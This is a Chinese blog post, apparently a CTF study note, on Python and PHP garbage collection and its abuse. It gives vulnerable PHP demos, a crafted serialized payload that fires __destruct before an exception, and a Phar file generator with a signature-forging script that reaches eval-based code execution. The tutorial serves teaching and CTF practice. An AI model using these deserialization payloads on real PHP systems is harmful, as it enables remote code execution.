<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/logo.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/logo.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"ayan0.top","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.24.1","exturl":false,"sidebar":{"position":"left","width_expanded":280,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":false,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":true,"style":"mac"},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="GC机制的隐患和利用 同样是受到队内赛一道题的启发吧，想着研究一下这个gc的机制，之前学pop链的时候也碰到过，但是没有深入的去摸 算是回来补一下坑，顺带把python的gc机制也看一眼">
<meta property="og:type" content="article">
<meta property="og:title" content="GC机制的隐患和利用">
<meta property="og:url" content="https://ayan0.top/2025/09/17/GC%E6%9C%BA%E5%88%B6%E7%9A%84%E9%9A%90%E6%82%A3%E5%92%8C%E5%88%A9%E7%94%A8/">
<meta property="og:site_name" content="Blog of AyaN0">
<meta property="og:description" content="GC机制的隐患和利用 同样是受到队内赛一道题的启发吧，想着研究一下这个gc的机制，之前学pop链的时候也碰到过，但是没有深入的去摸 算是回来补一下坑，顺带把python的gc机制也看一眼">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20221115004226-5276fe0e-643b-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20221115004246-5e4d4940-643b-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20221115004304-68c4e59a-643b-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20221115004320-7245733c-643b-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20221115004336-7c4c7b3c-643b-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20221115004358-88de5276-643b-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20221115004416-941ec1e8-643b-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20221115004428-9ab93b00-643b-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20221115004437-a0864370-643b-1.png">
<meta property="article:published_time" content="2025-09-17T07:40:36.000Z">
<meta property="article:modified_time" content="2025-09-17T08:38:41.648Z">
<meta property="article:author" content="AyaN0">
<meta property="article:tag" content="Web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20221115004226-5276fe0e-643b-1.png">


<link rel="canonical" href="https://ayan0.top/2025/09/17/GC%E6%9C%BA%E5%88%B6%E7%9A%84%E9%9A%90%E6%82%A3%E5%92%8C%E5%88%A9%E7%94%A8/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://ayan0.top/2025/09/17/GC%E6%9C%BA%E5%88%B6%E7%9A%84%E9%9A%90%E6%82%A3%E5%92%8C%E5%88%A9%E7%94%A8/","path":"2025/09/17/GC机制的隐患和利用/","title":"GC机制的隐患和利用"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>GC机制的隐患和利用 | Blog of AyaN0</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.5.0/search.js" integrity="sha256-xFC6PJ82SL9b3WkGjFavNiA9gm5z6UBxWPiu4CYjptg=" crossorigin="anonymous" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>







  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">
      <img class="custom-logo-image" src="/images/lly.jpg" alt="Blog of AyaN0">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Blog of AyaN0</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#gc%E6%9C%BA%E5%88%B6%E7%9A%84%E9%9A%90%E6%82%A3%E5%92%8C%E5%88%A9%E7%94%A8"><span class="nav-number">1.</span> <span class="nav-text"> GC机制的隐患和利用</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#python%E7%9A%84gc%E6%9C%BA%E5%88%B6"><span class="nav-number">1.1.</span> <span class="nav-text"> Python的gc机制</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#php%E7%9A%84gc%E6%9C%BA%E5%88%B6"><span class="nav-number">1.2.</span> <span class="nav-text"> PHP的gc机制</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#gc%E6%9C%BA%E5%88%B6%E5%9C%A8%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8"><span class="nav-number">1.2.1.</span> <span class="nav-text"> gc机制在反序列化中的应用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#pop%E9%93%BE"><span class="nav-number">1.2.1.1.</span> <span class="nav-text"> pop链</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-number">1.2.1.2.</span> <span class="nav-text"> phar反序列化</span></a></li></ol></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="AyaN0"
      src="/images/lly.jpg">
  <p class="site-author-name" itemprop="name">AyaN0</p>
  <div class="site-description" itemprop="description">不断的前进的人:只有0次摔倒或无数次的爬起</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">28</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">21</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/kisakiayano" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;kisakiayano" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/1594453512@qq.com" title="E-Mail → 1594453512@qq.com" rel="noopener me"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ayan0.top/2025/09/17/GC%E6%9C%BA%E5%88%B6%E7%9A%84%E9%9A%90%E6%82%A3%E5%92%8C%E5%88%A9%E7%94%A8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/lly.jpg">
      <meta itemprop="name" content="AyaN0">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Blog of AyaN0">
      <meta itemprop="description" content="不断的前进的人:只有0次摔倒或无数次的爬起">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="GC机制的隐患和利用 | Blog of AyaN0">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          GC机制的隐患和利用
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2025-09-17 15:40:36 / 修改时间：16:38:41" itemprop="dateCreated datePublished" datetime="2025-09-17T15:40:36+08:00">2025-09-17</time>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>5.3k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>10 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="gc机制的隐患和利用"><a class="markdownIt-Anchor" href="#gc机制的隐患和利用"></a> GC机制的隐患和利用</h1>
<p>同样是受到队内赛一道题的启发吧，想着研究一下这个gc的机制，之前学pop链的时候也碰到过，但是没有深入的去摸</p>
<p>算是回来补一下坑，顺带把python的gc机制也看一眼</p>
<h2 id="python的gc机制"><a class="markdownIt-Anchor" href="#python的gc机制"></a> Python的gc机制</h2>
<p>Python的回收机制是根据变量值被引用计数的次数来算的</p>
<pre><code class="highlight python">age=<span class="number">18</span></code></pre>
<p>此时18就被关联了一个变量名age引用计数为1</p>
<p>当</p>
<pre><code class="highlight python">y=age</code></pre>
<p>18关联的变量名+1,此时18的引用计数为2</p>
<p>当所有变量与18解除关联关系时，此时变量值18的引用计数为0</p>
<p>其占用的内存就被解释器的gc机制给回收掉了</p>
<p><strong>导致引用计数+1</strong></p>
<ul>
<li>对象被创建并赋值</li>
<li>对象被引用</li>
<li>对象作为参数传入函数</li>
<li>对象作为元素储存在列表，字典等</li>
</ul>
<p><strong>导致引用计数-1</strong></p>
<ul>
<li>del显式销毁对象</li>
<li>变量名被赋予新的对象</li>
<li>一个对象离开作用域(如函数执行完成)</li>
<li>对象所在容器被销毁，或从容器中删除对象</li>
</ul>
<p>可以使用<code>sys.getrefcount()</code>来查看对象的引用计数</p>
<p>而这种机制的隐患就在于循环引用</p>
<p>假如</p>
<pre><code class="highlight python"><span class="keyword">import</span> gc
<span class="keyword">class</span> <span class="title class_">ClassA</span>():
    <span class="keyword">def</span> <span class="title function_">__init__</span>:
        <span class="built_in">print</span>(<span class="string">&#x27;obj born&#x27;</span>)
<span class="keyword">def</span> <span class="title function_">f2</span>():
    <span class="keyword">while</span> <span class="literal">True</span>:
        c1=ClassA()
        c2=ClassA()
        c1.t=c2
        c2.t=c1
        <span class="keyword">del</span> c2
        <span class="keyword">del</span> c1</code></pre>
<p>那么直到显式删除时c1和c2的引用计数都是1，无法被回收，但是此时已经没有其他对象能够引用到c1和c2</p>
<p>这样就会导致关键数据的泄露</p>
<p>但是不用担心，也可以主动触发垃圾回收机制</p>
<ul>
<li>调用<code>gc.collect()</code></li>
<li>当<code>gc</code>模块的计数器达到阈值时</li>
<li>程序退出时</li>
</ul>
<pre><code class="highlight python"><span class="keyword">import</span> gc
<span class="keyword">import</span> os
<span class="keyword">class</span> <span class="title class_">ClassA</span>():
    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self</span>):
        <span class="variable language_">self</span>.flag=os.urandom(<span class="number">4</span>)
<span class="keyword">def</span> <span class="title function_">f2</span>():
    c1=ClassA()
    c2=ClassA()
    c1.t=c2
    c2.t=c1
    <span class="keyword">del</span> c2
    <span class="keyword">del</span> c1
gc.set_debug(gc.DEBUG_SAVEALL)

f2()
<span class="built_in">print</span>(<span class="string">&quot;gc.garbage:&quot;</span>, gc.garbage)
unreachable = gc.collect()
<span class="built_in">print</span>(<span class="string">f&quot;Unreachable objects: <span class="subst">&#123;unreachable&#125;</span>&quot;</span>)
<span class="built_in">print</span>(<span class="string">&quot;gc.garbage:&quot;</span>, gc.garbage)
<span class="built_in">print</span>(<span class="string">&quot;gc.garbage:&quot;</span>, gc.garbage[-<span class="number">1</span>].flag)</code></pre>
<p>这样就可以成功泄露flag</p>
<h2 id="php的gc机制"><a class="markdownIt-Anchor" href="#php的gc机制"></a> PHP的gc机制</h2>
<p>对于PHP，gc机制也是用的引用计数+回收周期</p>
<p>当一个变量被设置为<code>NULL</code>，或者没有任何指针指向时，它就会被变成垃圾，被<code>GC</code>机制自动回收掉</p>
<p>那么这里的话我们就可以理解为，当一个对象没有被引用时，就会被<code>GC</code>机制回收，在回收的过程中，它会自动触发<code>_destruct</code>方法，而这也就是我们绕过抛出异常的关键点</p>
<p>在PHP当中，在变量被创建后会被储存在一个名为<code>zval</code>的容器中，在这个<code>zval</code>变量容器中，不仅包含变量的类型和值，还包含两个字节的额外信息</p>
<pre><code class="highlight plaintext">第一个字节名为`is_ref`，是`bool`值，它用来标识这个变量是否是属于引用集合。PHP引擎通过这个字节来区分普通变量和引用变量，由于PHP允许用户使用`&amp;`来使用自定义引用，`zval`变量容器中还有一个内部引用计数机制，来优化内存使用。

第二个字节是`refcount`，它用来表示指向`zval`变量容器的变量个数。所有的符号存储在一个符号表中，其中每个符号都有作用域。</code></pre>
<p>看接下来的这个例子</p>
<pre><code class="highlight plaintext">&lt;?php
$a = &quot;new string&quot;; 
xdebug_debug_zval(&#x27;a&#x27;); //用于查看变量a的zval变量容器的内容
?&gt;</code></pre>
<p>我们可以看到这里定义了一个变量<code>$a</code>，生成了类型为<code>String</code>和值为<code>new string</code>的变量容器，而对于两个额外的字节，<code>is_ref</code>和<code>refcount</code>，我们这里可以看到是不存在引用的，所以<code>is_ref</code>的值应该是false，而<code>refcount</code>是表示变量个数的，那么这里就应该是1，接下来我们验证一下<br>
<img src="https://xzfile.aliyuncs.com/media/upload/picture/20221115004226-5276fe0e-643b-1.png" alt="img"><br>
接下来我们添加一个引用</p>
<pre><code class="highlight plaintext">&lt;?php
&lt;?php
$a=&quot;new string&quot;; 
$b =&amp;$a;
xdebug_debug_zval(&#x27;a&#x27;);
?&gt;</code></pre>
<p>按照之前的思路，每生成一个变量就有一个<code>zval</code>记录其类型和值以及两个额外字节，那我们这里的话a的<code>refcount</code>应该是1，<code>is_ref</code>应该是<code>true</code>，接下来我们验证一下<br>
<img src="https://xzfile.aliyuncs.com/media/upload/picture/20221115004246-5e4d4940-643b-1.png" alt="img"><br>
哎，结果不同于我们所想的，这是为什么呢？<br>
因为同一变量容器被变量a和变量b关联，当没必要时,php不会去复制已生成的变量容器。<br>
所以这一个<code>zval</code>容器存储了<code>a</code>和<code>b</code>两个变量，就使得<code>refcount</code>的值为2.</p>
<p>接下来说一下容器的销毁这个事。<br>
变量容器在<code>refcount</code>变成0时就被销毁。它这个值是如何减少的呢，当函数执行结束或者对变量调用了unset()函数,<code>refcount</code>就会减1。<br>
看个例子</p>
<pre><code class="highlight plaintext">&lt;?php
$a=&quot;new string&quot;; 
$b =&amp;$a;
$c =&amp;$b;
xdebug_debug_zval(&#x27;a&#x27;);
unset($b,$c);
xdebug_debug_zval(&#x27;a&#x27;);
?&gt;</code></pre>
<p>按照刚刚所说，那么这里的首次输出的<code>is_ref</code>应该是<code>true</code>，<code>refcount</code>为3。<br>
第二次输出的<code>is_ref</code>值是什么呢，我们可以看到引用<code>$a</code>的变量<code>$b</code>和<code>$c</code>都被<code>unset</code>了，所以这里的<code>is_ref</code>应该是<code>false</code>，也是因为<code>unset</code>，这里的<code>refcount</code>应该从<code>3</code>变成了<code>1</code>，接下来验证一下<br>
<img src="https://xzfile.aliyuncs.com/media/upload/picture/20221115004304-68c4e59a-643b-1.png" alt="img"></p>
<h3 id="gc机制在反序列化中的应用"><a class="markdownIt-Anchor" href="#gc机制在反序列化中的应用"></a> gc机制在反序列化中的应用</h3>
<p><code>GC</code>如果在PHP反序列化中生效，那它就会直接触发<code>_destruct</code>方法，接下来以例子来演示。</p>
<h4 id="pop链"><a class="markdownIt-Anchor" href="#pop链"></a> pop链</h4>
<p>首先来看变量被<code>unset</code>函数处理的情况</p>
<pre><code class="highlight plaintext">&lt;?php
highlight_file(__FILE__); 
error_reporting(0); 
class test&#123; 
    public $num; 
    public function __construct($num) &#123;
        $this-&gt;num = $num; echo $this-&gt;num.&quot;__construct&quot;.&quot;&lt;/br&gt;&quot;; 
    &#125;
    public function __destruct()&#123;
        echo $this-&gt;num.&quot;__destruct()&quot;.&quot;&lt;/br&gt;&quot;; 
    &#125;
    &#125;
$a = new test(1); 
unset($a);
$b = new test(2); 
$c = new test(3);</code></pre>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20221115004320-7245733c-643b-1.png" alt="img"><br>
这个是一种方法，还有一种方法，如下。<br>
我们知道当对象为<code>NULL</code>时也是可以触发<code>_destruct</code>的，所以我们这里的话来试一下反序列化一个数组，然后写入第一个索引为对象，将第二个赋值为<code>0</code>，看一下能否触发。(原理我感觉应该是给第一个对象赋值为0键时，此时又将0赋值给了另一个，就相当于它失去了引用，被视为垃圾给回收了)<br>
demo如下</p>
<pre><code class="highlight plaintext">&lt;?php
show_source(__FILE__);
$flag = &quot;flag&quot;;
class B &#123;
  function __destruct() &#123;
    global $flag;
    echo $flag;
  &#125;
&#125;
$a = unserialize($_GET[&#x27;1&#x27;]);
throw new Exception(&#x27;你想干什么&#x27;);</code></pre>
<p>我们可以看到这里在反序列化后就抛出异常了，如果按照正常的话，是无法触发<code>_destruct</code>的，我们按照先前所想，这里先反序列化一个数组</p>
<pre><code class="highlight plaintext">&lt;?php
show_source(__FILE__);

class B &#123;
  function __destruct() &#123;
    global $flag;
    echo $flag;
  &#125;
&#125;
$a=array(new B,0);

echo serialize($a);</code></pre>
<p>得到序列化文本如下</p>
<pre><code class="highlight plaintext">a:2:&#123;i:0;O:1:&quot;B&quot;:0:&#123;&#125;i:1;i:0;&#125;
对象类型:长度:&#123;类型:长度;类型:长度:类名:值类型:长度;类型:长度;&#125;
数组:长度为2::&#123;int型:长度0;类:长度为1:类名为&quot;B&quot;:值为0 int型:值为1：int型;值为0</code></pre>
<p>接下来我们按照我们所想，将第二个索引置空，就可以触发<code>GC</code>回收机制，因此修改序列化文本为</p>
<pre><code class="highlight plaintext">a:2:&#123;i:0;O:1:&quot;B&quot;:0:&#123;&#125;i:0;i:0;&#125;</code></pre>
<p>去尝试一下<br>
成功触发，看到这里也就知道了大致的思路<br>
<img src="https://xzfile.aliyuncs.com/media/upload/picture/20221115004336-7c4c7b3c-643b-1.png" alt="img"><br>
这里可以看到也是成功提前触发了<code>_destruct</code>，因为如果正常情况的话，有异常抛出就无法再触发<code>_destruct</code>了，而这个思路也是我们在CTF中绕过异常的一个方法。</p>
<h4 id="phar反序列化"><a class="markdownIt-Anchor" href="#phar反序列化"></a> phar反序列化</h4>
<pre><code class="highlight plaintext">&lt;?php 
highlight_file(__FILE__); 
class Test&#123; 
    public $code; 
    public function __destruct()&#123; 
        eval($this -&gt; code); 
        &#125; 
&#125;
$filename = $_GET[&#x27;filename&#x27;]; 
echo file_get_contents($filename); 
throw new Error(&quot;Garbage collection&quot;); 
?&gt;</code></pre>
<p>看到<code>file_get_contents</code>函数和类，就想到Phar反序列化，所以接下来尝试借助<code>file_get_contents</code>方法来进行反序列化(因为这里只是本地测试一下，所以不再设置文件上传那些，直接将生成的Phar文件放置本地进行利用了)。<br>
构造Exp如下</p>
<pre><code class="highlight plaintext">&lt;?php 
class test&#123;
    public $code= &quot;phpinfo();&quot;;
&#125;
$a = new test();
$c = array($a,0); 
$b = new Phar(&#x27;1.phar&#x27;,0);//后缀名必须为phar
$b-&gt;startBuffering();//开始缓冲 Phar 写操作
$b-&gt;setMetadata($c);//自定义的meta-data存入manifest
$b-&gt;setStub(&quot;&lt;?php __HALT_COMPILER();?&gt;&quot;);//设置stub，stub是一个简单的php文件。PHP通过stub识别一个文件为PHAR文件，可以利用这点绕过文件上传检测
$b-&gt;addFromString(&quot;test.txt&quot;,&quot;test&quot;);//添加要压缩的文件
$b-&gt;stopBuffering();//停止缓冲对 Phar 归档的写入请求，并将更改保存到磁盘
?&gt;</code></pre>
<blockquote>
<p>注：需要去检查一下php.ini中的phar.readonly选项，如果是On，需要修改为Off。否则会报错，无法生成phar文件<br>
小Tip: 这里如果有师傅不懂为什么这样写，可以学一下Phar反序列化，我之前也写过一篇关于Phar反序列化的文章，<br>
师傅们可以参考一下<a target="_blank" rel="noopener" href="https://tttang.com/archive/1732/">https://tttang.com/archive/1732/</a></p>
</blockquote>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20221115004358-88de5276-643b-1.png" alt="img"><br>
用<code>010editor</code>打开phar文件<br>
<img src="https://xzfile.aliyuncs.com/media/upload/picture/20221115004416-941ec1e8-643b-1.png" alt="img"><br>
可以发现<code>i:1</code>，按照我们之前的思路，我们这里将<code>i:1</code>修改成<code>i:0</code>就可以绕过抛出异常，但在Phar文件中，我们是不能任意修改数据的，否则就会因为签名错误而导致文件出错，不过签名是可以进行伪造的，所以我们先将<code>1.phar</code>中的<code>i:1</code>修改为<code>i:0</code>，接下来利用脚本使得签名正确。<br>
脚本如下</p>
<pre><code class="highlight plaintext">import gzip
from hashlib import sha1
with open(&#x27;D:\\phpStudy\\PHPTutorial\\WWW\html\\1.phar&#x27;, &#x27;rb&#x27;) as file:
    f = file.read() 
s = f[:-28] # 获取要签名的数据
h = f[-8:] # 获取签名类型以及GBMB标识
newf = s + sha1(s).digest() + h # 数据 + 签名 + (类型 + GBMB)
open(&quot;2.phar&quot;,&quot;wb&quot;).write(newf)</code></pre>
<p>打开2.phar文件查看一下<br>
<img src="https://xzfile.aliyuncs.com/media/upload/picture/20221115004428-9ab93b00-643b-1.png" alt="img"><br>
变成<code>i:0</code>且文件正常，接下来利用phar伪协议包含这个文件</p>
<pre><code class="highlight plaintext">$filename=phar://2.phar</code></pre>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20221115004437-a0864370-643b-1.png" alt="img"><br>
可以发现成功输出了phpinfo。</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="reward-container">
  <div>请我一杯咖啡吧！</div>
  <button>
    赞赏
  </button>
  <div class="post-reward">
      <div>
        <img src="/images/wechatpay.jpg" alt="AyaN0 微信">
        <span>微信</span>
      </div>

  </div>
</div>

          <div class="post-tags">
              <a href="/tags/Web/" rel="tag"># Web</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/09/17/YAML%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="prev" title="YAML反序列化">
                  <i class="fa fa-angle-left"></i> YAML反序列化
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/09/20/%E4%BB%8EN1Junoir%E6%8E%A2%E7%A9%B6%E5%90%84%E7%A7%8D%E7%8E%AF%E5%A2%83%E4%B8%8B%E7%9A%84base64%E5%A4%84%E7%90%86%E5%AE%89%E5%85%A8%E6%80%A7/" rel="next" title="从N1Junoir探究各种环境下的base64处理安全性">
                  从N1Junoir探究各种环境下的base64处理安全性 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">AyaN0</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">363k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">10:59</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
